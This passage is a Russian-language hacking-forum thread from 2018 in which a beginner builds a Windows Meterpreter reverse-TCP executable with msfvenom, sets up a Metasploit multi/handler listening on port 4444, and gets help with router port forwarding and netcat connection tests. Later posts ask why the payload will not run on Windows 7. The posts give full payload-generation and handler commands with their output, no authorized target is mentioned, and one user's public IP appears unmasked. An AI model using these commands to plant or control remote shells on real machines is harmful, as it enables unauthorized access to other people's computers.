HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 10.02.2018, 21:45
Vovo4ka
Guest
Сообщений: n/a
Провел на форуме:
7955

Репутация: 0
По умолчанию

Цитата:
Сообщение от Jerri  
Jerri said:

pkill -9 ruby и после попробуй запускать.
Не дало решительным образом ничего.

.SpoilerTarget" type="button">Spoiler

Код:
Code:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=109.---.--.--- LPORT=4444 -f exe R > /root/programm.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
root@kali:~# ls
Desktop  Documents  Downloads  programm.exe  Music  Pictures  Public  Templates  Videos
root@kali:~# pkill -9 ruby
root@kali:~# msfconsole
 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|

       =[ metasploit v4.16.15-dev                         ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler/
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 109.---.--.---
LHOST => 109.---.--.---
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit[*] Exploit running as background job 0.

[-] Handler failed to bind to 109.252.62.124:4444:-  -[*] Started reverse TCP handler on 0.0.0.0:4444
msf exploit(handler) > exit
 
Ответить с цитированием

  #12  
Старый 11.02.2018, 05:26
dmax0fw
Guest
Сообщений: n/a
Провел на форуме:
20361

Репутация: 46
По умолчанию

ну во первых в exploit/handler не нужно устанавливать в качестве LHOST свой внешний ip в случае если ты за роутером, ибо внешний ip это ip роутера а не машины с kali

но это в принципе всё равно, так как он предупреждает тебя о невозможности забиндить порт на этом ip и биндит его на любом доступном ipv4 интрефейсе

а во вторых закрой все метасплоиты, сделай на машине с кали nc -lvp 4444 , и попробуй подключиться на этот порт например с другой машины с линуксом:nc 4444

если порт проброшен верно и не мешают фаерволы, то в kali увидишь успешный коннект

а дальше уже плясать от этого
 
Ответить с цитированием

  #13  
Старый 11.02.2018, 19:57
Vovo4ka
Guest
Сообщений: n/a
Провел на форуме:
7955

Репутация: 0
По умолчанию

Цитата:
Сообщение от dmax0fw  
dmax0fw said:

ну во первых в exploit/handler не нужно устанавливать в качестве LHOST свой внешний ip в случае если ты за роутером, ибо внешний ip это ip роутера а не машины с kali
А какой тогда? Или вы имеете в виду, что надо сидеть не через роутер?

Цитата:
Сообщение от dmax0fw  
dmax0fw said:

а во вторых закрой все метасплоиты, сделай на машине с кали nc -lvp 4444 , и попробуй подключиться на этот порт например с другой машины с линуксом:nc 4444
если порт проброшен верно и не мешают фаерволы, то в kali увидишь успешный коннект
Что ж, похоже, порт проброшен неверно. Я запустил прослушку порта у себя на компьютере, и с телефона (через мобильный интернет, естессно) через Termux запустил netcat, который, немного подумав, радостно выдал Connection Timed Out.

Ладно, буду изучать в этом направлении подробней. Спасибо!
 
Ответить с цитированием

  #14  
Старый 11.02.2018, 20:58
dmax0fw
Guest
Сообщений: n/a
Провел на форуме:
20361

Репутация: 46
По умолчанию

Цитата:
Сообщение от Vovo4ka  
Vovo4ka said:

А какой тогда?
локальный ip машины на которой запущен метасплоит

вижу ты не совсем понимаешь суть проброса портов

когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip

метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов

ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит
 
Ответить с цитированием

  #15  
Старый 11.02.2018, 21:02
Vovo4ka
Guest
Сообщений: n/a
Провел на форуме:
7955

Репутация: 0
По умолчанию

Цитата:
Сообщение от dmax0fw  
dmax0fw said:

локальный ip машины на которой запущен метасплоит
вижу ты не совсем понимаешь суть проброса портов
когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит
Не, я понял уже) О том, что такое проброска портов, я уже знал) Просто голова последнее время совсем не работает) Спасибо
 
Ответить с цитированием

  #16  
Старый 12.02.2018, 20:35
Vovo4ka
Guest
Сообщений: n/a
Провел на форуме:
7955

Репутация: 0
По умолчанию

Цитата:
Сообщение от dmax0fw  
dmax0fw said:

локальный ip машины на которой запущен метасплоит
вижу ты не совсем понимаешь суть проброса портов
когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip
метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов
ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит


Верно ли я настроил проброску?
 
Ответить с цитированием

  #17  
Старый 12.02.2018, 21:48
Vovo4ka
Guest
Сообщений: n/a
Провел на форуме:
7955

Репутация: 0
По умолчанию

Есть! Handler запустился и работает (вроде как)! Спасибо! Посмотрю, будет ли нормально работать.
 
Ответить с цитированием

  #18  
Старый 14.02.2018, 21:27
Vovo4ka
Guest
Сообщений: n/a
Провел на форуме:
7955

Репутация: 0
По умолчанию

Теперь возникает ещё одна проблема: несовместимость полученных в msfvenom файлов с Виндой 7. Не запускаются ни под какими предлогами. Возможности проверить на других машинах нет. С чем это может быть связано?
 
Ответить с цитированием

  #19  
Старый 14.02.2018, 22:03
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

разрядность винды какая ?
 
Ответить с цитированием

  #20  
Старый 14.02.2018, 22:06
Vovo4ka
Guest
Сообщений: n/a
Провел на форуме:
7955

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sensoft  
Sensoft said:

разрядность винды какая ?
Скорее всего х64. сейчас посмотреть и сказать точно не могу, уточню позже.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ